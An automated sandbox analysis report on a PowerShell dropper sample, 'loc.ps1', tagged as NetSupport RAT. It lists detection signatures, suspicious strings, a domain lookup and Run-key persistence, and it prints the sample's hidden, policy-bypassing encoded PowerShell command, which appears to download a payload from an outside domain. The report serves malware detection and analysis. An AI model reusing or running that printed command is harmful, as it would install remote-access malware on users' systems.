Windows Analysis Report
loc.ps1

Overview

General Information

Sample Name: loc.ps1
Analysis ID: 876995
MD5: d7bd6a17466dbe1e448956b0018ad94d
SHA1: a9d50d22cc9024dc6bd3297286783ef4b38d6f99
SHA256: 5f5f8f102490525c22deed33b94fa01b52289e7166eedccd04cfece900958669
Tags: netsupportps1rat
Infos:

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Very long command line found
Potential dropper URLs found in powershell memory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Creates a process in suspended mode (likely to inject code)
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: loc.ps1 Virustotal: Detection: 22% Perma Link
Source: Binary string: ystem.Core.pdbpdb source: powershell.exe, 00000002.00000002.440315694.00000229ABC15000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdbpdblib.pdb source: powershell.exe, 00000002.00000002.440315694.00000229ABC42000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior

Networking
barindex
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQueryX
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ObsoletessAt
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Source: unknown DNS traffic detected: query: usherskenya.co.ke replaycode: Server failure (2)
Source: powershell.exe, 00000000.00000002.479156997.00000281D1C70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000003.470180866.00000281D1C47000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.440315694.00000229ABC42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.473249087.00000281B9C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.441829103.00000229AC1B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000003.435183245.00000229AD753000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://usherskenya.co.ke/forms/view.php8F

System Summary
barindex
Very long command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 4854
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 4854 Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF9A5707CA2 2_2_00007FF9A5707CA2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF9A570D3C5 2_2_00007FF9A570D3C5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF9A570DE43 2_2_00007FF9A570DE43
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF9A5700D30 2_2_00007FF9A5700D30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF9A57080AF 2_2_00007FF9A57080AF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF9A5700CD0 2_2_00007FF9A5700CD0
Source: loc.ps1 Virustotal: Detection: 22%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\loc.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc LgAoACcAYwBkACcAKQAgACQAewBFAGAATgBWADoAYQBwAGAAcABgAEQAQQB0AGEAfQA7ACAAJAB7AEwAYABpAG4ASwB9AD0AKAAiAHsAMAB9AHsAMQB9AHsANQB9AHsANgB9AHsANwB9AHsANAB9AHsAOAB9AHsAMgB9AHsAMwB9ACIAIAAtAGYAIAAnAGgAdAAnACwAJwB0AHAAcwA6ACcALAAnAHcALgAnACwAJwBwAGgAcAAnACwAJwByAG0AcwAvACcALAAnAC8ALwB1AHMAaABlAHIAcwBrAGUAJwAsACcAbgB5AGEALgBjAG8ALgBrAGUAJwAsACcALwBmAG8AJwAsACcAdgBpAGUAJwApADsAIAAkAHsAUgBuAGAAVQBtAH0APQAuACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAewBSAFIAbgBgAFUATQB9AD0ALgAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAAMQAwADIANAAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOQA5ADkAOwAgACQAewBDAEgAYABSAFMAfQA9ACgAIgB7ADkAfQB7ADcAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAMAB9AHsAMwB9AHsANgB9AHsAMQB9AHsAMgB9AHsAOAB9ACIAIAAtAGYAJwBwAHMAJwAsACcAWAAnACwAJwBZACcALAAnAEoAJwAsACcAdAB1AHYAdwB4ACcALAAnAG4AbwAnACwAJwBLAEwATQBOAE8AUABSAFMAVABVAFYAVwAnACwAJwBtACcALAAnAFoAJwAsACcAYQBiAGMAZABlAGYAZwBoAGkAagBrAGwAJwAsACcAeQB6AEEAQgBDAEQARQBGAEcASABJACcAKQA7ACAAJAB7AHIAYABTAHQAUgB9AD0AJwAnADsAIAAkAHsAUgBgAEEATgB9AD0AJgAoACIAewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAGMAdAAnACwAJwBlACcALAAnAGoAJwAsACcATgBlAHcALQBPAGIAJwApACAAKAAiAHsAMAB9AHsAMgB9AHsAMQB9AHsAMwB9ACIALQBmACAAJwBTAHkAJwAsACcAZQBtAC4AUgBhAG4AZABvACcALAAnAHMAdAAnACwAJwBtACcAKQA7ACAAZgBvAHIAIAAoACQAewBJAH0APQAwADsAIAAkAHsASQB9ACAALQBsAHQAIAAkAHsAcgBgAE4AVQBtAH0AOwAgACQAewBpAH0AKwArACkAIAB7ACQAewByAFMAYABUAHIAfQArAD0AJAB7AEMAaABgAFIAUwB9AFsAJAB7AFIAYABBAG4AfQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB0ACcALAAnAG4AZQB4ACcAKQAuAEkAbgB2AG8AawBlACgAMAAsACAAJAB7AGMAYABIAFIAUwB9AC4AIgBMAGAARQBuAEcAdABIACIAKQBdAH0AOwAgACQAewBSAFoAYABJAHAAfQA9ACQAewByAGAAcwB0AFIAfQArACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHAAJwAsACcALgB6AGkAJwApADsAIAAkAHsAUABBAGAAVABoAH0APQAkAHsAZQBuAGAAVgBgADoAYQBQAFAAZABhAHQAYQB9ACsAJwBcACcAKwAkAHsAcgBaAGAAaQBwAH0AOwAgACQAewBQAGAAegBJAHAAfQA9ACQAewBFAE4AVgA6AGEAYABwAGAAcABkAGEAdABBAH0AKwAoACgAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAJwB7ADAAfQAnACwAJwBPAE4ARQBOADAAVABFACcALAAnAHUAcABkAGEAdABlAF8AJwApACkAIAAtAGYAWwBjAEgAQQByAF0AOQAyACkAKwAkAHsAUgBSAG4AYABVAG0AfQA7ACAAJgAoACIAewAyAH0AewAzAH0AewAxAH0AewA0AH0AewA1AH0AewAwAH0AIgAgAC0AZgAgACcAcgAnACwAJwBuACcALAAnAFMAdABhAHIAdAAtAEIAJwAsACcAaQB0AHMAVAByAGEAJwAsACcAcwAnACwAJwBmAGUAJwApACAALQBTAG8AdQByAGMAZQAgACQAewBsAGkAYABOAEsAfQAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJAB7AFAAYQBgAFQAaAB9ADsAIAAuACgAIgB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcAZQAnACwAJwB4AHAAYQAnACwAJwBlACcALAAnAG4AZAAtAGEAcgBjAGgAaQB2ACcAKQAgAC0AcABhAHQAaAAgACQAewBwAGEAYABUAEgAfQAgAC0AZABlAHMAdABpAG4AYQB0AGkAbwBuAHAAYQB0AGgAIAAkAHsAcABgAHoASQBQAH0AOwAgACQAewBmAGAATwBsAGQAfQA9AC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBlAG0AJwAsACcAdAAtAEkAdAAnACwAJwBHAGUAJwApACAAJAB7AHAAYAB6AEkAUAB9ACAALQBGAG8AcgBj
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc LgAoACcAYwBkACcAKQAgACQAewBFAGAATgBWADoAYQBwAGAAcABgAEQAQQB0AGEAfQA7ACAAJAB7AEwAYABpAG4ASwB9AD0AKAAiAHsAMAB9AHsAMQB9AHsANQB9AHsANgB9AHsANwB9AHsANAB9AHsAOAB9AHsAMgB9AHsAMwB9ACIAIAAtAGYAIAAnAGgAdAAnACwAJwB0AHAAcwA6ACcALAAnAHcALgAnACwAJwBwAGgAcAAnACwAJwByAG0AcwAvACcALAAnAC8ALwB1AHMAaABlAHIAcwBrAGUAJwAsACcAbgB5AGEALgBjAG8ALgBrAGUAJwAsACcALwBmAG8AJwAsACcAdgBpAGUAJwApADsAIAAkAHsAUgBuAGAAVQBtAH0APQAuACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAewBSAFIAbgBgAFUATQB9AD0ALgAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAAMQAwADIANAAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOQA5ADkAOwAgACQAewBDAEgAYABSAFMAfQA9ACgAIgB7ADkAfQB7ADcAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAMAB9AHsAMwB9AHsANgB9AHsAMQB9AHsAMgB9AHsAOAB9ACIAIAAtAGYAJwBwAHMAJwAsACcAWAAnACwAJwBZACcALAAnAEoAJwAsACcAdAB1AHYAdwB4ACcALAAnAG4AbwAnACwAJwBLAEwATQBOAE8AUABSAFMAVABVAFYAVwAnACwAJwBtACcALAAnAFoAJwAsACcAYQBiAGMAZABlAGYAZwBoAGkAagBrAGwAJwAsACcAeQB6AEEAQgBDAEQARQBGAEcASABJACcAKQA7ACAAJAB7AHIAYABTAHQAUgB9AD0AJwAnADsAIAAkAHsAUgBgAEEATgB9AD0AJgAoACIAewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAGMAdAAnACwAJwBlACcALAAnAGoAJwAsACcATgBlAHcALQBPAGIAJwApACAAKAAiAHsAMAB9AHsAMgB9AHsAMQB9AHsAMwB9ACIALQBmACAAJwBTAHkAJwAsACcAZQBtAC4AUgBhAG4AZABvACcALAAnAHMAdAAnACwAJwBtACcAKQA7ACAAZgBvAHIAIAAoACQAewBJAH0APQAwADsAIAAkAHsASQB9ACAALQBsAHQAIAAkAHsAcgBgAE4AVQBtAH0AOwAgACQAewBpAH0AKwArACkAIAB7ACQAewByAFMAYABUAHIAfQArAD0AJAB7AEMAaABgAFIAUwB9AFsAJAB7AFIAYABBAG4AfQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB0ACcALAAnAG4AZQB4ACcAKQAuAEkAbgB2AG8AawBlACgAMAAsACAAJAB7AGMAYABIAFIAUwB9AC4AIgBMAGAARQBuAEcAdABIACIAKQBdAH0AOwAgACQAewBSAFoAYABJAHAAfQA9ACQAewByAGAAcwB0AFIAfQArACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHAAJwAsACcALgB6AGkAJwApADsAIAAkAHsAUABBAGAAVABoAH0APQAkAHsAZQBuAGAAVgBgADoAYQBQAFAAZABhAHQAYQB9ACsAJwBcACcAKwAkAHsAcgBaAGAAaQBwAH0AOwAgACQAewBQAGAAegBJAHAAfQA9ACQAewBFAE4AVgA6AGEAYABwAGAAcABkAGEAdABBAH0AKwAoACgAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAJwB7ADAAfQAnACwAJwBPAE4ARQBOADAAVABFACcALAAnAHUAcABkAGEAdABlAF8AJwApACkAIAAtAGYAWwBjAEgAQQByAF0AOQAyACkAKwAkAHsAUgBSAG4AYABVAG0AfQA7ACAAJgAoACIAewAyAH0AewAzAH0AewAxAH0AewA0AH0AewA1AH0AewAwAH0AIgAgAC0AZgAgACcAcgAnACwAJwBuACcALAAnAFMAdABhAHIAdAAtAEIAJwAsACcAaQB0AHMAVAByAGEAJwAsACcAcwAnACwAJwBmAGUAJwApACAALQBTAG8AdQByAGMAZQAgACQAewBsAGkAYABOAEsAfQAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJAB7AFAAYQBgAFQAaAB9ADsAIAAuACgAIgB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcAZQAnACwAJwB4AHAAYQAnACwAJwBlACcALAAnAG4AZAAtAGEAcgBjAGgAaQB2ACcAKQAgAC0AcABhAHQAaAAgACQAewBwAGEAYABUAEgAfQAgAC0AZABlAHMAdABpAG4AYQB0AGkAbwBuAHAAYQB0AGgAIAAkAHsAcABgAHoASQBQAH0AOwAgACQAewBmAGAATwBsAGQAfQA9AC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBlAG0AJwAsACcAdAAtAEkAdAAnACwAJwBHAGUAJwApACAAJAB7AHAAYAB6AEkAUAB9ACAALQBGAG8AcgBj Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\ONEN0TEupdate_1220 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_em3oh2mh.n0i.ps1 Jump to behavior
Source: classification engine Classification label: mal64.troj.evad.winPS1@4/8@0/0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: ystem.Core.pdbpdb source: powershell.exe, 00000002.00000002.440315694.00000229ABC15000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdbpdblib.pdb source: powershell.exe, 00000002.00000002.440315694.00000229ABC42000.00000004.00000020.00020000.00000000.sdmp
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF9A57080A2 push esi; retf 2_2_00007FF9A57080A3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF9A570A024 push edi; ret 2_2_00007FF9A570A039
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF9A5709F24 push edi; ret 2_2_00007FF9A5709F39
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF9A5711C57 push esp; retf 2_2_00007FF9A5711C58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF9A57DB9DE push 8B485F9Bh; iretd 2_2_00007FF9A57DB9E6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ONEN0TEupdate_1220 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ONEN0TEupdate_1220 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
